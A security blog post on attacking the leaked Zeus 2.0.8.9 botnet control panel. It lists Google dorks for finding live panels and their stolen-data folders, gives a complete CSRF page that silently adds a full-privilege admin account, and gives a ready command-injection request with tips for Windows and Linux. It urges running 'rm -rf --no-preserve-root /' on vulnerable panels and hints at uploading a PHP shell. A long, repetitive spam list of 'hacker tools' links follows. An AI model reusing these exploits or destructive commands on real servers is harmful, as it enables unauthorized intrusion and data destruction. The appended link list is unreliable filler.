Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:

• inurl:cp.php?m=login - this should be the login to the control panel
• inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
• inurl:install/index.php - this should be deleted, but I think this is useless now.

Boring vulns found

• Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
• No password policy - admins can set up really weak passwords
• No anti brute-force - you can try to guess the admin's password. Default username is admin
• Password autocomplete enabled - boring
• Missing HttpOnly flag on session cookie - it could be nice if I could find any XSS. I need more time to find one!
• No CSRF protection - except on the password change, where the old password is needed :-( boring

Update: You can use the CSRF to create a new user with admin privileges:

<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html> 

• MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
• ClickJacking - really boring stuff
• Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
• SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)

The following stuff looks good, at least some vulns were taken seriously:

• The system directory is protected with .htaccess deny from all.
• gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
• Anti XSS: the following code is used almost everywhere

return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');

My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)

And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler:

POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1 

because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)

Related posts

1. Hacker Tools 2020
2. Install Pentest Tools Ubuntu
3. Wifi Hacker Tools For Windows
4. Hacker Tools Online
5. Hack Tools For Ubuntu
6. New Hacker Tools
7. Nsa Hack Tools
8. Black Hat Hacker Tools
9. Blackhat Hacker Tools
10. How To Hack
11. Hacker Tools List
12. Hacker Tools Hardware
13. Pentest Tools Windows
14. Wifi Hacker Tools For Windows
15. Hack Tool Apk No Root
16. Game Hacking
17. Hacker Tools Free
18. Pentest Tools For Mac
19. Hacker Tools Mac
20. Pentest Recon Tools
21. Game Hacking
22. Best Pentesting Tools 2018
23. Physical Pentest Tools
24. Termux Hacking Tools 2019
25. Tools For Hacker
26. Pentest Tools For Ubuntu
27. Hacker Tools Free
28. Pentest Tools Subdomain
29. Hack Website Online Tool
30. Hacking Tools For Pc
31. Pentest Tools Review
32. Hack Tools 2019
33. Pentest Tools Port Scanner
34. Hacks And Tools
35. Physical Pentest Tools
36. Pentest Tools Download
37. Pentest Tools For Ubuntu
38. Hack Apps
39. Hacker Security Tools
40. Pentest Tools Online
41. Hack Website Online Tool
42. Hacking Tools Github
43. World No 1 Hacker Software
44. Hacking Tools Free Download
45. Easy Hack Tools
46. Hack Tools Pc
47. Pentest Tools For Ubuntu
48. Pentest Tools Port Scanner
49. Hacker Tools Github
50. New Hacker Tools
51. Hacking App
52. Hacking Tools For Windows 7
53. Hack Tools Download
54. Pentest Tools Nmap
55. What Is Hacking Tools
56. Hacking Tools Online
57. Hacking Apps
58. Hacker Tool Kit
59. Hack Tools Github
60. Pentest Tools List
61. Pentest Tools Linux
62. Hacker Tools List
63. Hacker Tools Github
64. Pentest Tools Android
65. Pentest Tools For Windows
66. Tools Used For Hacking
67. Pentest Tools List
68. What Are Hacking Tools
69. Hacking Tools For Mac
70. Hack Tools Online
71. Hacking Tools Usb
72. Pentest Tools For Android
73. Hacking Tools For Windows
74. Physical Pentest Tools
75. Best Hacking Tools 2019
76. Hack Tools For Mac
77. Hacker Tools
78. Hack Tools For Ubuntu
79. Wifi Hacker Tools For Windows
80. Hacking Tools Github
81. Hacker Tools For Ios
82. Blackhat Hacker Tools
83. Pentest Tools Tcp Port Scanner
84. Hack Tools 2019
85. Hack Tools 2019
86. Hacking Tools Download
87. Android Hack Tools Github
88. Bluetooth Hacking Tools Kali
89. Hacking Tools And Software
90. Hack Tools For Windows
91. Hacker Tools
92. Kik Hack Tools
93. Pentest Tools For Mac
94. Hackrf Tools
95. Hacking Tools
96. Easy Hack Tools
97. Pentest Tools Windows
98. Pentest Tools Framework
99. Easy Hack Tools
100. Beginner Hacker Tools
101. Nsa Hack Tools Download
102. Hacker Tools For Windows
103. Pentest Tools Windows
104. Pentest Tools Linux
105. Hacker Tools Software
106. Hacker Hardware Tools
107. Pentest Tools Download
108. What Are Hacking Tools
109. Hacker Tools Github
110. Hacker Tools For Ios
111. Pentest Automation Tools
112. Pentest Tools
113. Hacker Hardware Tools
114. Hacking Tools 2019
115. Nsa Hack Tools Download
116. Pentest Tools Nmap
117. Pentest Tools Framework
118. Hacker Tools Apk Download
119. Pentest Box Tools Download
120. Hacking Tools For Beginners
121. Free Pentest Tools For Windows
122. Hacker Tools
123. Hacker Tools Apk Download
124. How To Make Hacking Tools
125. How To Make Hacking Tools
126. Pentest Tools Linux
127. Blackhat Hacker Tools
128. Hacking Tools Software
129. Hacking Tools
130. Github Hacking Tools